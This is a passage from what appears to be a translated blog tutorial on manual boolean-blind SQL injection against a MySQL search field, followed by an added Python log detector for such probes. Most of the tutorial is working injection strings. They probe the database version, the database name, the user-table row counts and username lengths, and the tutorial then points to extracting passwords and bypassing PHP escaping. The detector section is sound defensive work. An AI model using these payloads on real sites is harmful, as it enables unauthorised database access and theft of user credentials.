A certain expert ran into a search-type injection where the usual tools would not run, so he worked it by hand; I am only a beginner. After reading his write-up and carefully working through it, I wrote this note. As with other blind injection methods, the injection is driven by judging the page echo (whether the page renders normally or errors out).

The injection point reported an error; from that error it is known that the database is MySQL.

0x01 Determine the database version

Use left() to intercept the version string:

%' and (SELECT left(version(),1) > 4) and '%'='   /* echo normal */
%' and (SELECT left(version(),1) > 6) and '%'='   /* echo error */
%' and (SELECT left(version(),1) = 5) and '%'='   /* echo normal */

"> 4" echoes normally, so the version is greater than 4; "> 6" produces an error; "= 5" echoes normally, so the version is 5.

0x02 Determine the length of the database name

%' and (SELECT length(database()) > 1) and '%'='   /* echo normal */
%' and (SELECT length(database()) > 4) and '%'='   /* echo error */
%' and (SELECT length(database()) = 4) and '%'='   /* echo normal */

From the echo, the database name is 4 characters long.
0x03 Guess the database name

%' and (SELECT left(database(),1) > '1') and '%'='
%' and (SELECT left(database(),1) = 'p') and '%'='
%' and (SELECT left(database(),2) = 'Ph') and '%'='
%' and (SELECT left(database(),3) = 'php') and '%'='
%' and (SELECT left(database(),4) = 'phpx') and '%'='

Here the classic half-interval (binary search) method is used to guess each character:

%' and (SELECT left(database(),1) > '1') and '%'='   /* echo normal */
%' and (SELECT left(database(),1) > '9') and '%'='   /* echo normal: the first character is not a digit */
%' and (SELECT left(database(),1) > 'A') and '%'='   /* echo normal */
%' and (SELECT left(database(),1) > 'Z') and '%'='   /* echo error: start halving the interval */
%' and (SELECT left(database(),1) > 'M') and '%'='   /* echo normal: between m and z */
%' and (SELECT left(database(),1) > 'R') and '%'='   /* echo error: between m and r */
%' and (SELECT left(database(),1) = 'p') and '%'='   /* echo normal: identified as p */
%' and (SELECT left(database(),2) = 'Ph') and '%'='  /* if the echo is normal, the second character is h */
............
By the half-interval method above, the database name is phpx.

0x04 Guess the fields

%' and (select count(username) from user) > 0 and '%'='   /* total number of rows in the user table */
%' and (select count(*) from user) > 2 and '%'='          /* echo error */
%' and (select count(*) from user) > 1 and '%'='          /* echo correct */
%' and (select count(*) from user) = 2 and '%'='          /* echo correct: the user table has two rows */

0x05 Guess the length of the username

%' and (select length(username) from user limit 0,1) > 0 and '%'='    /* echo correct */
%' and (select length(username) from user limit 0,1) > 9 and '%'='    /* echo correct */
%' and (select length(username) from user limit 0,1) > 10 and '%'='   /* echo error */
%' and (select length(username) from user limit 0,1) = 10 and '%'='   /* echo correct: the first username is 10 characters long */
%' and (select length(username) from user limit 1,1) > 0 and '%'='    /* echo correct; the second username is also 10 characters long */

0x06 Guess the values

Guessing the values by hand is very laborious; Burp Suite can be used to submit the request repeatedly and work through the guesses. The method is the same as above.

0x07 Password

The method is the same as the one used to guess the username.

0x08 Special characters and bypassing GPC escaping in PHP

If special characters are encountered, the substr() function can be used here; see the manual for details. For bypassing GPC escaping, see Xi Ke's article, for example:

select substr(left((select user from ebt_user), 1), 1) = char(48)
%' and (SELECT left(version(),1) = 5) and '%'='

Finally, thanks to crazy guy for his help; his blog is http://fuck.0day5.com
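Seen from the defending side, the probes above have a very recognisable shape: a quote that breaks out of the LIKE wildcard, a comparison on left()/length()/count()/version(), and a trailing '%'=' that re-closes the search term, repeated dozens of times from one client while the binary search runs. The following detector is an added example (not from the original post, and not the blog's or any project's code); it runs over a few constructed, URL-encoded access-log lines and flags clients that send such probes. The log format, the /search.php?q= parameter and the threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic): two ordinary searches
# and a run of boolean-blind probes in the shape shown in the post, URL-encoded
# the way a browser or proxy would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?q=phone HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=%25%27+and+%28SELECT+left%28version%28%29%2C1%29%3E4%29+and+%27%25%27%3D%27 HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=%25%27+and+%28SELECT+length%28database%28%29%29%3E4%29+and+%27%25%27%3D%27 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=%25%27+and+%28SELECT+left%28database%28%29%2C1%29%3E%27m%27%29+and+%27%25%27%3D%27 HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=%25%27+and+%28select+count%28%2A%29+from+user%29%3D2+and+%27%25%27%3D%27 HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?q=left+handed+mouse HTTP/1.1" 200 910
"""

# Common/combined log format: client IP and the request target are all we need.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Trait 1: quote break-out followed by AND, and the '%'=' that re-closes the LIKE.
BREAKOUT_RE = re.compile(r"'\s*and\s*\(.*\).*?and\s*'%'\s*=\s*'", re.I | re.S)
# Trait 2: a comparison on a string/metadata function, as every probe above uses.
PROBE_FN_RE = re.compile(
    r"\b(left|substr|substring|mid|length|version|database|count)\s*\(.*?[<>=]",
    re.I | re.S)


def is_blind_probe(decoded_query: str) -> bool:
    """True when the decoded query string shows both traits of a boolean-blind probe."""
    return bool(BREAKOUT_RE.search(decoded_query) and PROBE_FN_RE.search(decoded_query))


def probes_per_client(log_text: str) -> Counter:
    """Count boolean-blind probes per source IP over the given log lines."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than guessing
        ip, target = m.groups()
        query = target.partition("?")[2]
        if is_blind_probe(unquote_plus(query)):
            hits[ip] += 1
    return hits


def alert_clients(log_text: str, threshold: int = 3) -> list:
    """IPs at or above the threshold: a character-by-character search needs many probes."""
    return sorted(ip for ip, n in probes_per_client(log_text).items() if n >= threshold)


if __name__ == "__main__":
    print(probes_per_client(SAMPLE_LOG))
    print(alert_clients(SAMPLE_LOG))
```

A single match is a strong signal on its own; the per-client count mainly helps prioritise, and the same two regexes can be applied to the decoded POST body when the search form is submitted by POST.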